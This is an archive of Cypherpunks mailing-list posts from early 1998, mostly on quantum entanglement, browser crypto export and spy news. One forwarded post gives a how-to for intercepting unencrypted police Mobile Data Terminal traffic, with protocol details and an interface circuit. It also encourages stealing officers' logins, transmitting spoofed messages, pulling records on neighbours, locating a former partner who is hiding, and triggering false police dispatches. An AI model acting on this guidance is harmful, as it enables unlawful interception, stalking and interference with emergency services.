To: Steve Schear <cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Planetary rovers, SETI and other musings, was Re: update.356 (fwd)
In-Reply-To: <199801281428.IAA06743@einstein.ssz.com>
Message-ID: <v03102800b0f539761a9b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:44 AM -0800 1/28/98, Steve Schear wrote:

>If that is the case, I still don't understand why and out-of-band signal is
>required.  If the sender collapses the wave function shortly before the
>signal reaches the intended receiver its unlikely to have changed
>polarization again.

Because the state is not known until time of measurement, at which point
the other state takes on the opposite value. (Using the language of
"collapsing the wave function," which is, BTW, not the only interpretation.)

No information can be sent because the sender cannot pick the values to send.

Instead of thinking in terms of a single bit, think in terms of a message,
to make the point even clearer.

Suppose the message to be sent is "Attack at dawn."

Suppose the bit version of this is "1 0 0 0 1 0 1 1 0 1 1 1 1 0 .....etc."

Now, how does the sender possibly send this?

He can't, unless he also sends a signal saying "Ignore the first bit, keep
the second bit, keep the third bit, ignore the fourth bit,....." In other
words, a key.

(And they can't even agree on a key "in advance," because the sender cannot
control how the polarizations will come out.)

This will have to be my last post on this subject. Please read any of the
many basic treatments of these things.

As with the endothermic vs. exothermic debate, there is much out there, and
the Cypherpunks list is a very poor place to discuss basic quantum
mechanics.

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 29 Jan 1998 04:26:37 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: how to ensure 128 bit netscape is used world wide (Re:Exporting Code the Easy Way)
In-Reply-To: <v03102809b0f4820cf059@[207.167.93.63]>
Message-ID: <v03102803b0f53dac17e8@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 2:29 AM -0800 1/28/98, Adam Back wrote:

>The problem is not in the export, which as Tim says happens soon
>enough anyway, as anyone can verify looking at www.replay.com where a
>good collection of 128 bit browsers can be obtained.
>
>The problem is netscape's distribution license.  I tried to work out
...
>This leads to the conclusion that the best thing netscape could do is:
>
>- not distribute a 40 bit version in electronic form at all, forcing
>  overseas sites to keep 128 bit versions


How about this as an idea:

-- encourage Web servers to reply to 40-bit Navigator or Explorer
interactions with a message saying:

-- "You have communicated with a very insecure 40-bit....."

-- "Click here, ...., to update your browser to 128 bits..."

(And the "here" site would be some outside-the-U.S. sites, of course.)

This would either patch their browser, or with a plug-in. And if their
browser cannot be patched, they are at least alerted and can perhaps
upgrade.

The idea being to make it very easy for customers who were forced to use
the 40-bit version, or who got it by default or screwup, to easily update
their browsers to full strength.

Netscape should make this as easy as possible. (We have discussed
"drop-ins" many times over the years, and the possible ITAR/EAR illegality
of providing "hooks" or "drop-ins" for thoughtcrime-strength crypto, but I
can't imagine anyone being successfully prosecuted on this.)

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 29 Jan 1998 01:31:18 +0800
To: cypherpunks@toad.com
Subject: New D.C./C.A. Judge
Message-ID: <1.5.4.32.19980128172632.00c5e838@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



One of twelve appointments announced today by the White House:

DISTRICT OF COLUMBIA COURT OF APPEALS

Emilio W. Cividanes, D.C. Court of Appeals 

     Mr. Cividanes, of Washington, D.C., is of counsel to the law firm 
Piper & Marbury, L.L.P.   Since 1991, Mr. Cividanes has taught 
information privacy law as an adjunct professor at Georgetown 
University Law Center.  Before joining Piper & Marbury as an associate 
in 1988, he served one year as counsel to the Senate Judiciary 
Committee's Subcommittee on Technology & the Law, under then-Chairman 
Senator Patrick Leahy.  From 1983 to 1986, he was a civil litigation 
associate with the law firm of Dickstein, Shapiro & Morin.  Mr. 
Cividanes received his B.A. in 1979, from Haverford College and his 
J.D. in 1983, from the University of Pennsylvania Law School, where 
he was a comment editor on the Law Review. 

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 29 Jan 1998 02:57:01 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Quantum teleportation and communication (fwd)
Message-ID: <199801281850.MAA07813@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 28 Jan 1998 10:29:16 -0800
> From: Tim May <tcmay@got.net>
> Subject: Quantum teleportation and communication

> Steve asked in another message about where one learns about some of this
> stuff. As always, "Scientific American" is a good place to look for
> articles. They've had many articles on Bell's Theorem, nonlocality, the EPR
> paradox/nonparadox, the Aharanov-Bohm results, and quantum teleportation. A
> SciAm article will explain, with pictures, in ways we can't here. (Plus the
> articles are carefully written, by experts--we waste too much time here
> getting lost in misunderstandings about the meanings of terms of art.)
> "Science News" is sometimes good, too. And "New Scientist" and "Nature."
> Any library should have plenty of articles.

I agree with the reference to Sci-Am, with one priviso. A few years ago they
put a pair of books on just these topics. They are a collection of articles
published over the years and instead of digging through a variety of
magazines and such these two will save a lot of time.

Particles and Forces: The heart of the matter
ISBN 0-7167-2070-1
$11.95

Particle Physics in the Cosmos
ISBN 0-7167-1919-3
$9.95

And a much more technical book that I like a lot is:

Understanding Quantum Physics: A user's manual
M.A. Morrison
ISBN 0-13-747908-5
~$50

Enjoy.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 29 Jan 1998 02:55:06 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Nanotechnology info on the Web (fwd)
Message-ID: <199801281851.MAA07853@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From owner-traveller@Phaser.ShowCase.MPGN.COM Wed Jan 28 12:34:55 1998
X-Authentication-Warning: phaser.Showcase.MPGN.COM: majordom set sender to owner-traveller@lists.MPGN.COM using -f
From: Dedly <Dedly@aol.com>
Message-ID: <c888b1a2.34cf74b7@aol.com>
Date: Wed, 28 Jan 1998 13:11:00 EST
To: traveller@mpgn.com
Subject: Nanotechnology info on the Web
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7bit
Organization: AOL (http://www.aol.com)
X-Mailer: Inet_Mail_Out (IMOv11)
Sender: owner-traveller@Phaser.ShowCase.MPGN.COM
Reply-To: traveller@mpgn.com

If any of you are interested in what's going on in nanotechnology these
days......

www.nanothinc.com

They're trying to be an all-encompassing resource on nanotechnology. Although
this industry is in its infancy, there's some really interesting things going
on. 

Regarding the site itself: It helps to have a high speed modem as there are
alot of graphics. They also play with a bit of shockwave so it would help to
have that plug-in as well.

\_/
DED





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 29 Jan 1998 05:11:40 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: EPR, Bell, and FTL Bandwidth (fwd)
In-Reply-To: <199801282036.OAA08857@einstein.ssz.com>
Message-ID: <199801282103.NAA09138@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



there's a lot of books out on the subject, but one suitable
for popular interest is "the cosmic code" by Heinz R. Pagels,
it's actually in paperback. does a nice job of giving a
straightforward explanation of bell's paradox/inequality.

the only relevance of QM to this list I can see is the
possibility of computer storage/computation using it.

there's a nice article in discover of jan 1998, p94 on 
Gershenfeld and Chuang's accomplishment of using atomic spin
states to compute the sum of two binary digits. (qubits).
at the rate science is going I'd say that any major
quantum mechanical computation such as factoring a small
number is probably at least a decade away.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@sundernet.com>
Date: Thu, 29 Jan 1998 02:09:51 +0800
To: cypherpunks <cypherpunks@toad.com
Subject: Spyking snips: Police MDT's + cia/russian spying
Message-ID: <Pine.SUN.3.96.980128130055.27062A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



2)From: "Brandon Robinson" <brobinson@navicom.com>
Subject: Re: Monitoring MDT's 

>14)From: "self destruct" <<slfdstrct@email.msn.com>
>Subject: Monitoring MDT's
>hi all,....i am wondering if there is a way to monitor police MDT's
>(mobile display terminals)
>i have the frq. that they use but i dont know how to hook up a scanner to
>p/c. any thoughts would be appreciated thank you

Since no one else seemed to respond to this, I guess I will...first off
M.D.T. stands for (Mobile Data Terminals), I got this posting off some
group I can't really remeber where from, but it is informative, and was
the
subject of a Feb, '97 "911Dispatcher Magazine" story. It should answer all
of your questions, I also have a list of some places where you can buy the
unit pre-made, or a kit to make your own. I have left the Source code out
on purpose as it is rather lengthy, if you want it I can send it to you. 

-BBR
----------------------- Begin quoted article ----------------------

>From lord@heaven.com Mon Dec 23 23:11:43 EST 1996
Article: 44420 of alt.radio.scanner
Subject: MDT stuff

Greetings one and all,

Have you ever lusted to decode Mobile Data Terminal (MDT)
tranmissions? Have you ever wanted to see the same NCIC and motor
vehicle information that law enforcement officers see? Have you ever
wanted to see what officers send to each other over "private" channels?
And all this with an interface you can build with only a few dollars
worth of parts from your local radio shack?

If so this posting might be your rendevous with destiny. The tail
end of this posting includes the source code of a program that decodes
and displays MDT messages. It stores roughly 30k of messages in a buffer
and then writes the whole buffer to a file called "data.dat" before
terminating. The program may be interrupted at any time by pressing any
key (don't use control-c) at which point it writes the partially filled
buffer to "data.dat". This program only works for systems built by
Motorola using the MDC4800 tranmission protocol. This accounts for a
large fraction of public service MDT systems as well other private
systems.

The existence of this program is ample evidence that Motorola has
misrepresented its MDT systems when it marketed them as a secure means
of communcications. The interested reader will soon discover that these
systems do not use any form of encryption. Security concerns instead
have been dealt with by using a code. "And what might this code be
called?" asks the reader. The code turns out to be plain ASCII. What
follows is a brief description of how the program and the MDC4800
protocol work. If you don't understand something go to your local
library and check out a telecommunications theory book.

1. The raw transmission rate is 4800 baud. The program's interrupt
service routine simply keeps track of the time between transitions. If
you're receiving a perfect signal this will be some multiple of 1/4800
seconds which would then give you how many bits were high or low. Since
this is not the best of all possible worlds the program instead does the
following: transitions are used to synchronize a bit clock. One only
samples whenever this clock is in the middle of the bit to produce the
raw data stream. This greatly reduces jitter effects.

2. Whenever a tranmitter keys up the MDC4800 protocol calls for bit
synchronization (a sequence of 1010101010101010....). In the program
this will result in receive bit clock synchronization. There is no need
to specifically look for the bit sync.

3. Look for frame synchronization in raw bit stream so that data
frames can be broken apart. Frame synchronization consists of a 40 bit
sequence : 0000011100001001001010100100010001101111. If this sequence is
detected (or 35 out of 40 bits match up in the program) the system is
idling and the next 112 bit data block is ignored by the program. If the
inverted frame sync is detected one immediately knows that 112 bit data
blocks will follow.

4. Receive the 112 bit data block and undo the bit interleave. This
means that one must reorder the bits in the following sequence : {0,16,
32,48,64,80,96,1,17,33,49,65,81,97,2,18,34,...} if the orignal sequence
were received as {0,1,2,3,4,5,6,7,8,...}.

5. Check the convolutional error correcting code and count the
number of errors. The error correcting code is rate 1/2 which means we
will be left with 56 data bytes. The encoder is constructed so that the
output consists of the original data bits interspersed with error
correcting code. The generating polynomial used is :
1 + X^-1 + X^-5 + X^-6
Whenever an error is detected a counter is incremented. An attempt is
made to correct some errors by finding the syndrome and looking for the
bogus bit.

6. Keep receiving 112 bit data blocks until either a new frame sync
is found or two consecutive data blocks have an unacceptably large
number of errors.

7. Each data block consists of six data bytes; the last 8 bits are
status bits that are simply ignored. The program shows the data in two
columns - hexadecimal and ASCII. This data is kept in a buffer and is
written to the file "data.dat" when the program terminates.

8. What the program doesn't do: As a further check on the data
there can be CRC checks. This varies from protocol to protocol so this
program does not implement the CRC checks. Nonetheless, it is a
relatively trivial matter to find the generating polynomial. The
addresses, block counts, and message ID numbers are also quite easy to
deduce.

As you can see, there is no encryption. The bit interleave and the error
correcting coding are there solely to insure the integrity of the ASCII
data. Since any moron could have figured this stuff out from scratch one
could argue that MDTs do not use "...modulation parameters intentionally
witheld from the public". Therefore the Electronic Communications
Privacy Act may not prohibit receiving MDT tranmissions. However,
consult your attorney to make sure.

The total disregard for security will no doubt annoy countless
Motorola customers who were assured that their MDT systems were secure.
Since Federal law states that NCIC information must be encrypted your
local law enforcement agency might be forced to spend millions of
dollars to upgrade to a secure MDT system - much to the delight of
Motorola and its stockholders. Cynics might conclude that the release of
a program like this is timed to coincide with the market saturation of
existing MDT systems.

Also, this program is completely free and it had better stay that
way. What's to prevent you from adapting this into a kit and selling it
>from classified ads in the back of Nuts and Volts? Nothing. But take a
look at Motorola's patents sometime. You'll notice that this program
does things that are covered by a shitload of patents. So any attempt to
take financial advantage of this situtation will result in utter misery.

Please keep the following in mind: this program only works with the
first serial port (COM1). If your mouse or modem is there too bad. If
you don't like this rewrite the program.

------------------------------------------------------------------------
What equipment do I need?

RADIO SCANNER:

A scanner that can receive 850-869 MHz. For those of you who don't
know, this is the band where most business and public service trunked
radio systems can be found along with the mobile data terminal
transmissions. Chances are excellent that if your local authorities have
a motorola trunked radio system and mobile data terminals that this is
the frequency band in use. Very rarely will one find mobile data
terminals in other frequency bands.

Now for the fun part - your scanner should probably be modified to
allow you to tap off directly from the discriminator output. If you wait
until the signal has gone through the radio's internal audio filtering
the waveform will likely be too heavily distorted to be decoded. This is
exactly the same problem that our friends who like to decode pager
transmissions run into - some of them have claimed they can only decode
512 baud pager messages using the earphone output of their scanner.
These mobile data terminal messages are 4800 baud so I don't think you
have a snowball's chance in hell without using the discriminator output.
If you don't know where to begin modifying your scanner you might want
to ask those who monitor pagers how to get the discriminator output for
your particular radio.

COMPUTER/SCANNER INTERFACE

Those of you who have already built your interface for decoding
pager messages should be able to use that interface without any further
ado. For those starting from scratch - you might want to check out
packages intended for pager decoding such as PD203 and the interfaces
they describe. The following excerpt gives an example of a decoder that
should work just fine (lifted out of the PD203 POCSAG pager decoder
shareware documentation):

>
> 0.1 uF |\ +12v
> ---||-----------------------|- \|
> AF IN | |741 \
> ---- | | /--------------------- Data Out
> | \ ------|+ /| | CTS (pin 5/8)
> | / 100K | |/-12v | or DSR (pin 6/6)
> | \ | |
> GND / ----/\/\/\---- GND ------ GND (pin 7/5)
> | | 100K
> | \ N.B. Pin Numbers for com port are
> GND / given as x/y, where x is for a 25
> \ 10K way, y for a 9 way.
> /
> |
> GND
>
> The above circuit is a Schmitt Trigger, having thresholds of about +/-
1v.
> If such a large threshold is not required, eg for a discriminator
output,
> then the level of positive feedback may be reduced by either reducing
the
> value of the 10K resistor or by increasing the value of the 100K
feedback
> resistor.
>
> The +/- 12v for the op-amp can be derived from unused signals on the COM
> port (gives more like +/- 10v but works fine !):-
>
>
> TxD (2/3) --------------|<-------------------------------------- -12v
> | |
> RTS (4/7) --------------|<-------- GND - -
> | | _ + 10uF
> --------->|------- - - |
> Diodes 1N4148 | - + 10uF GND
> | |
> DTR (20/4) ------------->|-------------------------------------- +12v
>

If I were building this circuit I would strongly suggest tying the
non-inverting (+) input of the op-amp to ground since you are working
directly with the discriminator output and don't need a Schmitt trigger.
All these parts or equivalents are easily available (even at your local
Radio Shack which stocks the finest collection of components that have
failed the manufacturer's quality control checks and supported by a
sales staff that's always got the wrong answers to your questions).

Also: DO NOT use the RI (ring indicator) as an input to the computer.
-------------------------------------------------------------------------

How do I check things?

As a first step, I would get a package such as PD203 and use it to
decode a few pages. If you can get that working you know that that your
interface circuit is functioning correctly.

If you are in a reasonably sized town you might be part of the
ardis network. The ardis network is a nationwide commercial mobile data
terminal network where one can send/receive E-mail messages from one's
portable computer. It has been exclusively assigned the frequency of
855.8375 MHz. Therefore, if you can hear digital bursts on this
frequency you are basically guarranteed that these are MDC4800 type
messages. You should be able to get stuff popping up on your screen
although a lot of the messages will not be plain english.

If your interface works but you can't seem to get any messages on
the screen for a channel you know is a Motorola MDT system then it might
be possible that your scanner/interface is putting out data with the
polarity reversed. To check for this run the program with a command line
arguement. When it runs you should an initial "Polarity reversed"
message and hopefully then things will work out for you.

Other than that: if this program doesn't work pester someone else
who has got it working. Don't bother pestering the author(s) of this
posting; the shit(s) aka "she/he/it (s)" are afraid of a thousand
lawyers from Motorola descending like fleas to infest their pubic hair
and accordingly have decided to remain forever anonymous. No doubt
someone on the usenet who sees this post will know what to do with this
program and also hopefully rewrite into a more user friendly form. When
you do please don't forget to release the source code.
-------------------------------------------------------------------------
Future projects/nightmares you might want to think about:

Certain MDT systems embed formatting information in the text in the
form of ESC plus [ plus a few more bytes. Someone might want to decode
these on the fly and format the output so it looks exactly the same way
as the user sees it.

Make it so that this program works with com ports other than COM1.

Make it user friendly?

Enlarge the data buffer from the current 30k.

Give the output data file an unique name each time the program is
run instead of "data.dat".

How about sorting through the past traffic so that you only see
traffic to a specified user?

The program does not cut data blocks off in the display but it
might add an extra one or two (which will display as all zeroes).
Someone might want to make all those zeroes be shown as blanks instead.

Write some real instructions.

Now the more ambitous stuff:

Are you half-way competent with RF engineering? Then listen in to
the tranmissions from the mobile units back to the base station. That
way you get everyone's password and user IDs as they log on to the MDT
system. By this point you will no doubt have been able to figure out all
of the appropriate communications protocols so you should think about
getting your own transmitter up and running along with the necessary
program modifications so that you can transmit MDT messages. The
required transmitter can be very simple - for example, those masocists
who want to start from scratch might want to special order an
appropriate crystal (pulling the frequency with the computer's tranmit
signal), building a frequency multiplier chain, and adding a one watt RF
amplifier to top it all off (see the appropriate ARRL publications for
more information on radio techniques). Now you can log in and look at
the criminal records and motor vehicle information on anybody you can
think of. Find out what your neigbors are hiding. Find out who that
asshole was that cut you off downtown. Find out where your former
girl/boy friend is trying to hide from you. And on and on...
Those with simpler tastes might want to simply transmit at the base
station's frequency to any nearby MDT terminal - now you too can
dispatch your local law enforcement agencies at the touch of your
fingers!!! See your tax dollars at work tearing apart every seam of your
neighbor's house. Or create strife and dissension in your local law
enforcement agency as more and more officers come out of the closet
using their MDTs trying to pick up fellow officers.

There are municipalities that have put GPS receivers on all of
their vehicles. Should it happen that the information is sent back over
one of these networks you could have your computer give you a real-time
map showing the position of every vehicle and how far away they are from
you.

Extend your knowledge to other data networks. Here you will want to
look at the RAM mobile data network. It uses the MOBITEX protocol which
is really easy to find information on. Since it is an 8 kilobaud GMSK
signal there is a decent chance that you can use the interface described
here. This transmission mode demmands much more from your equipment than
MDT tranmissions. At the very least you must be much more careful to
make sure you have adequate low frequency response. Despite this it is
possible to receive and decode MOBITEX transmissions with a simple
op-amp circuit! This just goes to show you what drivelling bullshit
RAM's homepage is filled with - they explain in great detail how hackers
will never be able to intercept user's radio tranmissions (incidentally
explaining how to decode their tranmissions). The necessary program will
be the proverbial exercise left for the reader. For better performance
buy a dedicated MOBITEX modem chip and hook it up to your computer.

----------------------------------------------------------------------

A few words about the program:

Remember - you must have your decoder hooked up to COM1. The RTS
line will be positive and the DTR line negative but if you built the
decoder with a bridge rectifier you really don't have to worry about
their polarity. Stop the program by punching any key; don't use
control-c or control-break!

If you must reverse polarity run the program with any command line
arguement (example: type in "mdt x" at the command line if your program
is mdt.exe). You should then see the "Polarity Reversed." message pop up
and hopefully things will then work.

As far as compiling this - save the latter portion of this posting
(the program listing) and feed it to a C compiler. Pretty much any C
compiler from Borland should work. If you (Heaven Forbid) use a
Microsoft C compiler you might need to rename some calls such as
outport. Follow any special instructions for programs using their own
interrupt service routines. This program is not object oriented. It also
does not want anything whatsoever to do with Windows. Please don't even
think about running this program under Windows. Finally, here it is:

Good Luck and may God be with ya

**************************************************************************

Subject: More real spy stuff...

Germany smuggled agent out of Russia

Germany's Federal Intelligence Agency smuggled one of its Russian
agents to safety while Russian President Boris Yeltsin and German
Chancellor Helmut Kohl were meeting in Moscow last Nov., the weekly
news magazine Focus said Monday. The BND had received a tip that a
long-serving Russian agent was threatened and launched a cloak and
dagger operation Nov. 29 to pull the agent out of Russia. The agent,
a 32-year-old Army captain from the Russian town Samara with the code
name "Coastal Fog," had given BND Russian military communications
secrets for years. The rescue operation took place as Kohl and
Yeltsin sat down for talks.

Russian spies still fighting the Cold War in Britain

Security sources say Moscow is as eager as ever to uncover
defence secrets But now it is acting  more for economic than
militaristic reasons. Security sources put Russian military
espionage in Britain at the same level as it was in the 1980s.
In a radio broadcast in December, President Yeltsin,
speaking about Russia's intelligence aims, said:
"Notwithstanding positive changes after the end of the
Cold War, tough competition is still underway in the
world. Competition for new technology and geo-political
influence is increasing."

Space Imagery Overhaul Aims at Better Data and Easier Access

The shuttle flight is part of a massive modernization of the
multibillion-dollar U.S. intelligence collection program. The goal
is to compile a comprehensive view of the world from
overhead -- using the shuttle, satellites, spy planes and missiles
-- and to consolidate the data in a single computerized system
accessible to civilian and military officials across the
government.

A CIA Target at Home in America
By DANIEL C. TSANG
Los Angeles Times January 18, 1998

Because of me, the Central Intelligence Agency has had to concede it does 
spy on Americans. Just last month, the agency had to remove a denial
posted 
on its Web site that it doesn't do this. For it kept a file on me
throughout the 1980s and '90s--despite a law against political spying on
Americans. 
Just before Christmas, the CIA revised its Web site. The new version says 
the CIA can keep files on Americans if they are suspected of espionage or
international terrorism. But I am no spy or terrorist. The CIA conceded as 
much by settling my lawsuit, paying my lawyers some $46,000 and promising
to expunge my file and never spy on my political activities in the
future.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 29 Jan 1998 03:23:39 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Planetary rovers, SETI and other musings, was Re: update.356 (fwd)
Message-ID: <199801281918.NAA08167@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 28 Jan 1998 10:44:57 -0800
> From: Steve Schear <schear@lvdi.net>
> Subject: Re: Planetary rovers, SETI and other musings, was Re: update.356
>  (fwd)

> >The state is determined *at the time of collapse*. Once the collapse occurs
> >the synchronization is no longer present and subsequent events can indeed
> >alter the polarization of one particle without altering the other. Simply
> >bouncing that photon via refraction off a surface can alter the
> >polarization.
> 
> If that is the case, I still don't understand why and out-of-band signal is
> required.  If the sender collapses the wave function shortly before the
> signal reaches the intended receiver its unlikely to have changed
> polarization again.

What do you mean 'shortly before', the collapse is instantaneous. There ain't
no time to send anything. The channle can carry one bit of data, the
collapse has occured (1) or it hasn't (0). It isn't like a modem, CD, or
other comm channels where you have a bandwidth and can piggy back signals
for synchronization by using parts of that bandwidth.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 29 Jan 1998 03:36:48 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Oregon no-knock leads to conflict [CNN]
Message-ID: <199801281935.NAA08338@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

>                  OFFICER KILLED, 2 WOUNDED IN OREGON SHOOT-OUT
>                                        
>       Map of Oregon January 28, 1998
>      Web posted at: 2:06 p.m. EST (1906 GMT)
>      
>      PORTLAND, Oregon (AP) -- One officer was killed and two were wounded
>      in Portland Tuesday as they forced their way through the door of a
>      home that neighbors say was stocked with high-powered weapons.
>      
>      Police with black body armor and shields surrounded the house and
>      wounded the lone suspect. He was taken out three hours later and
>      hospitalized with gunshot wounds to the chest and stomach.
>      
>      The suspect, identified as 37-year-old Steven Dons, was stripped by
>      officers and driven away naked and bleeding on the tailgate of an
>      armored SWAT van.
>      


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Thu, 29 Jan 1998 04:25:41 +0800
To: cypherpunks@cyberpass.net
Subject: EPR, Bell, and FTL Bandwidth
Message-ID: <199801282017.OAA09290@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Steve Schear writes"
 
> Why aren't the coding techniques commonly used in telecom and disk
> data encoding adequate to both synchonize and convey data?
 
Think of the classical case.  I bake two fortune cookies, one with
"FOO" written on the slip of paper inside, and the other reading
"BAR." I then put them in a box and shake it for quite a while, until
the final state has chaotic dependence upon initial conditions, and
cannot be predicted.  I then keep one fortune cookie, and mail the
other one to Lucky Green in Tonga.
 
Someday in the future, I open my cookie, and instantly know what Lucky
will see when he opens his.  In doing so, I have created a
"instantaneous" correlation between two things separated by a vast
distance, which were in an identical state of ambiguity prior to one
of them being examined.
 
I am sure we will agree that there was no genuine faster-then-light
communication of information in this case.
 
In quantum mechanics, pairs of observables may have the property that
both of them may not be known precisely for a physical system.  The
Heisenberg Uncertainty principle states this for position and
momentum. Similar relationships exist for energy and time,
polarization or angular momentum measured with respect to different
axes, and various other things.  In addition, measuring a physical
system for one such variable always changes its wavefunction into one
for which the value of that variable is precisely specified, and the
value of the other "non-commuting" variable is not.
 
You can see this easily with three polarizing filters.  If you shine a
light through two of them at right angles to each other, it will be
completely blocked.  But it you insert third filter at a 45 degree
angle, some light will get through.  This is because light whose
polarization is known to be vertical or horizontal is in a mixed state
with respect to its polarization rotated 45 degrees.
 
It is therefore tempting to think that perhaps the miracle of quantum
mechanics could be employed in our fortune cookie experiment for the
transmission of information.  I generate many pairs of cookies, with
random but identical polarization, keeping one of each pair for
myself, and sending the other to Lucky.  I then encode a stream of
bits by measuring the polarization of 100 cookies, vertically if I
wish to transmit a "0", and at a 45 degree angle if I choose to
transmit a "1".  I then know Lucky's corresponding cookie to be in an
exact state with respect to one of these observables, and in a mixed
state with respect to the other, and if Lucky measures the vertical
polarization of his groups of cookies, there should be a correlation
between his results and mine which can only be explained by non-local
communication of my choice, on the fly, of which way I measured the
polarization, to his apparatus.
 
Now here we have good news and bad news.  The good news is that when
we do such an experiment, precisely enough to know for sure that there
is a spacelike separation between the two measurement events, we do
indeed see the correlation predicted by quantum mechanics.  The bad
news is that either end of the experiment, by itself, cannot see this
correlation without knowing what results were obtained by the person
at the other end. The correlation is between both ends.  There is no
experiment that can be done by either end alone which will turn out
differently depending upon what the guy at the opposite end is doing.
 
Thus, while such experiments involve non-local communication between
two locations separated by a spacelike distance, such communication is
obvious only to someone able to see what is going on in both places at
once, but not to either isolated experimenter. Hence, the non-local
collapse of quantum mechanical wavefunctions cannot be employed for
the transmission of information.
 
A similar argument applies to quantum teleporation, in which the value
of some measurable variable is transferred from a dynamical system to
one of two particles in correlated but unknown quantum states, causing
the particle's twin to take on an identical value.  Again, a person
able to view both systems can see that non-local communication has
taken place, but there is nothing either end can do by itself to learn
what has transpired at the other end.  This is because the correlation
which proves non-local communication is present only in combined data
from both ends of the experiment, but not in data from either end
alone.

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 29 Jan 1998 04:47:03 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: EPR, Bell, and FTL Bandwidth (fwd)
Message-ID: <199801282036.OAA08857@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Eric Cordian <emc@wire.insync.net>
> Subject: EPR, Bell, and FTL Bandwidth
> Date: Wed, 28 Jan 1998 14:17:49 -0600 (CST)

> Think of the classical case.  I bake two fortune cookies, one with
> "FOO" written on the slip of paper inside, and the other reading
> "BAR." I then put them in a box and shake it for quite a while, until
> the final state has chaotic dependence upon initial conditions, and
> cannot be predicted.  I then keep one fortune cookie, and mail the
> other one to Lucky Green in Tonga.
>  
> Someday in the future, I open my cookie, and instantly know what Lucky
